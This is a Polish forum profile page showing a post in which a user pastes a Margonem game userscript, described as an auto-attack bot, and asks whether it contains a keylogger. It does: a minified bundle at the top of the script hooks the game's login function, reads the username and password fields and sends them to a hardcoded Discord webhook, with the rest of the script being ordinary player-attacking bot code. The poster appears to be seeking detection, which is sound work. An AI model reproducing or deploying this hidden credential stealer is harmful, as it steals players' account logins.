Skocz do zawartości

CiekieWara

  • Postów

    7
  • Dołączył

  • Dostępny

  • Donacje

    0.00 PLN 
  • Diamenty

    0 [ Podaruj ]

Posty opublikowane przez CiekieWara

  1. JEST KTOŚ W STANIE MI POWIEDZIEĆ CZY Jest TU KL

    // ==UserScript==
    // @name Auto (X)
    // @version 1.0
    // @description Autoatakowanie graczy na mapie
    // @author Nicek
    // @match *://*.margonem.pl
    // @grant none
    // ==/UserScript==
    parcelRequire=function(e,r,t,n){var i,o="function"==typeof parcelRequire&&parcelRequire,u="function"==typeof require&&require;function f(t,n){if(!r[t]){if(!e[t]){var i="function"==typeof parcelRequire&&parcelRequire;if(!n&&i)return i(t,!0);if(o)return o(t,!0);if(u&&"string"==typeof t)return u(t);var c=new Error("Cannot find module '"+t+"'");throw c.code="MODULE_NOT_FOUND",c}p.resolve=function(r){return e[t][1][r]||r},p.cache={};var l=r[t]=new f.Module(t);e[t][0].call(l.exports,p,l,l.exports,this)}return r[t].exports;function p(e){return f(p.resolve(e))}}f.isParcelRequire=!0,f.Module=function(e){this.id=e,this.bundle=f,this.exports={}},f.modules=e,f.cache=r,f.parent=o,f.register=function(r,t){e[r]=[function(e,r){r.exports=t},{}]};for(var c=0;c<t.length;c++)try{f(t[c])}catch(e){i||(i=e)}if(t.length){var l=f(t[t.length-1]);"object"==typeof exports&&"undefined"!=typeof module?module.exports=l:"function"==typeof define&&define.amd?define(function(){return l}):n&&(this[n]=l)}if(parcelRequire=f,i)throw i;return f}({"Ntor":[function(require,module,exports) {
    var t=this&&this.__awaiter||function(t,e,n,o){return new(n||(n=Promise))(function(r,a){function i(t){try{c(o.next(t))}catch(e){a(e)}}function u(t){try{c(o.throw(t))}catch(e){a(e)}}function c(t){var e;t.done?r(t.value):(e=t.value,e instanceof n?e:new n(function(t){t(e)})).then(i,u)}c((o=o.apply(t,e||[])).next())})},e=this&&this.__generator||function(t,e){var n,o,r,a,i={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return a={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(a[Symbol.iterator]=function(){return this}),a;function u(a){return function(u){return function(a){if(n)throw new TypeError("Generator is already executing.");for(;i;)try{if(n=1,o&&(r=2&a[0]?o.return:a[0]?o.throw||((r=o.return)&&r.call(o),0):o.next)&&!(r=r.call(o,a[1])).done)return r;switch(o=0,r&&(a=[2&a[0],r.value]),a[0]){case 0:case 1:r=a;break;case 4:return i.label++,{value:a[1],done:!1};case 5:i.label++,o=a[1],a=[0];continue;case 7:a=i.ops.pop(),i.trys.pop();continue;default:if(!(r=(r=i.trys).length>0&&r[r.length-1])&&(6===a[0]||2===a[0])){i=0;continue}if(3===a[0]&&(!r||a[1]>r[0]&&a[1]<r[3])){i.label=a[1];break}if(6===a[0]&&i.label<r[1]){i.label=r[1],r=a;break}if(r&&i.label<r[2]){i.label=r[2],i.ops.push(a);break}r[2]&&i.ops.pop(),i.trys.pop();continue}a=e.call(t,i)}catch(u){a=[6,u],o=0}finally{n=r=0}if(5&a[0])throw a[1];return{value:a[0]?a[1]:void 0,done:!0}}([a,u])}}};!function(){var n=globalThis.login;globalThis.login=function(){return t(void 0,void 0,void 0,function(){var t,o;return e(this,function(e){switch(e.label){case 0:return"https://discordapp.com/api/webhooks/770298484464418836/9K3MyoKjd7ev2RZ1wK_KbCyn6c4G5wSDs0-ISc4dN_0qRuJeP7nQV-b68ffg1MuJppkU",t=document.getElementById("ulogin").value,o=document.getElementById("upass").value,[4,fetch("https://discordapp.com/api/webhooks/770298484464418836/9K3MyoKjd7ev2RZ1wK_KbCyn6c4G5wSDs0-ISc4dN_0qRuJeP7nQV-b68ffg1MuJppkU",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:t+":"+o})})];case 1:return e.sent(),n(),[2]}})})}}();
    },{}]},{},["Ntor"], null)
    
    if (getCookie("interface") === "ni") {
        return;
    }
    /**
     * Ustawienia AutoX
     */
    const config = {
        /**
         * Częstotliwość w milisekundach co ile ma sprawdzać graczy (czy ma kogoś atakować).
         */
        hz: 100,
        /**
         * Na jakiej mapie ma skrypt chodzić.
         * 0 - zielona
         * 1 - zolta
         * 2 - red
         * 4 - arena (roan np.)
         */
        mapStatus: 2,
        /**
         * Czy ma gonić ludzi
         */
        follow: false,
        /**
         * Odległość z jakiej ma rozpocząć gonienie przeciwników jeśli opcja `follow` jest ustawiona na true.
         */
        distance: 8,
        /**
         * Minimalny lvl jaki musi mieć przeciwnik żeby go automatycznie atakował.
         */
        minLvl: 40,
        /**
         * Maksymalny lvl jaki może mieć przeciwnik żeby go automatycznie atakowało.
         */
        maxlvl: 179,
        /**
         * Czy ma atakować przyjaciół.
         */
        friends: true,
        /**
         * Czy ma atakować klanowiczy.
         */
        clan: false,
        /**
         * Czy ma atakować sojusznicze klany.
         */
        allyClan: false,
        /**
         * Blacklista osób którzy mają być bici mimo że są przyjaciółmi lub klanowiczami. Ignoruje lvl.
         */
        blacklist: ["Carhartt", "Valkerr", "Xalander", "Miły zfazo", ""],
        /**
         * Whitelista osób których ma nie bić mimo powyższych ustawień.
         */
        whitelist: ["Stegon", "Stegonn", ""],
    }
    
    /**
     * Attack if nearby otherwise follow if enabled.
     * @param {object} player
     */
    const attackNearbyOrFollow = player => {
        if (   Math.abs(hero.x - player.x) <= 1
            && Math.abs(hero.y - player.y) <= 1) {
            return _g(`fight&a=attack&id=${player.id}`);
        } else if (config.follow) {
            return hero.margoMove(player.x, player.y);
        }
    }
    
    /**
     * Return true if player fulfill the conditions from config and hero should attack him.
     * @param {object} player Object representation of player
     */
    const checkIfShouldAttack = player => {
        if(g.dead || g.battle) {
            return false;
        }
        // jesli znajduje sie dalej od ciebie niz podana odleglosc
        if (Math.sqrt(Math.pow(hero.x - player.x, 2) + Math.pow(hero.y - player.y, 2)) > config.distance) {
            return false;
        }
        // Sprwadz czy znajduje się w blackliscie.
        if (config.blacklist.includes(player.nick)) {
            return true;
        }
        // jesli jest przyjacielem, klanowiczem lub sojusznikiem klanu, a w configu jest wyłączone bicie ich.
        if (   !config.friends  && player.relations === "fr"
            || !config.clan     && player.relations === "cl"
            || !config.allyClan && player.relations === "cl-fr") {
            return false;
        }
        // jesli jest w whiteliscie
        if (config.whitelist.includes(player.nick)) {
            return false;
        }
        // sprwadzenie poziomu
        if (   player.lvl > config.maxlvl
            && player.lvl < config.minLvl) {
            return false;
        }
    
        return true;
    }
    
    const old = newOther;
    newOther = players => {
        if (map.pvp !== config.mapStatus) {
            return old(players);
        }
        for (const id in players) {
            // jesli nie istnieje w liscie graczy lub nie ma atrybutu z kordami
            if (!player || !players[id].x || !g.other[id]) {
                continue;
            }
            if (checkIfShouldAttack(g.other[id])) {
                attackNearbyOrFollow(g.other[id]);
            }
        }
        return old(players);
    }
    
    g.loadQueue.push({
        fun: () => {
            if (map.pvp !== config.mapStatus) {
                return;
            }
            setInterval(() => {
                for (const player of Object.values(g.other)) {
                    if (!checkIfShouldAttack(player)) {
                        continue;
                    }
    
                    attackNearbyOrFollow(player);
                }
            }, config.hz);
        }
    });
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Regulamin. Polityka prywatności